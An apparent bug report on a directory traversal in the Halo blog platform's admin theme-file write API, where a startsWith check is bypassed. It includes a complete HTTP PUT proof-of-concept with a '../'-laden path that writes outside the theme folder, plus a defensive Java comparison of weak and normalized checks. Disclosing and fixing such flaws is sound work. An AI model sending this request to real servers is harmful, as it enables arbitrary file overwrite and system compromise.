Closed
Description
I am sure I have checked
I want to apply
- BUG feedback
There is an interface to write files in the background. A directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
```
PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}
```
Therefore, the attacker can overwrite some files, such as ftl files or .bashrc files in the user directory, and finally get the permissions of the operating system.
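
The prefix check described in this report, next to a normalized containment check, as an added example that is not part of the original issue and is not Halo's own code. The class name, method names and the theme root (taken from the path in the request body above) are assumptions, and Unix-style paths are assumed.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class ThemePathCheck {
    // Assumed theme root, taken from the "path" value in the reported request.
    static final Path THEME_ROOT = Paths.get("/root/.halo/templates/themes/anatole");

    // Weak check (hypothetical): compares the raw string prefix only, so any
    // ".." segments after the prefix are accepted. Path.startsWith() without
    // normalize() accepts them too, because ".." is just another component.
    static boolean weakCheck(String requested) {
        return requested.startsWith(THEME_ROOT.toString());
    }

    // Hardened check: collapse "." and ".." first, then compare whole path
    // components, so sibling directories sharing a name prefix do not match.
    // normalize() does not resolve symlinks; for files that already exist,
    // Path.toRealPath() can be used before the comparison.
    static boolean strictCheck(String requested) {
        Path normalized = Paths.get(requested).toAbsolutePath().normalize();
        return normalized.startsWith(THEME_ROOT.normalize());
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the second is the path from the report.
        String[] samples = {
            "/root/.halo/templates/themes/anatole/index.ftl",
            "/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned",
            "/root/.halo/templates/themes/anatole_evil/index.ftl",
        };
        for (String s : samples) {
            System.out.printf("%-68s weak=%-5b strict=%b%n",
                    s, weakCheck(s), strictCheck(s));
        }
    }
}
```

The first sample passes both checks; the second and third pass only the weak check, since the reported path normalizes to `/tmp/pwned` and `anatole_evil` is a different path component from `anatole`.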
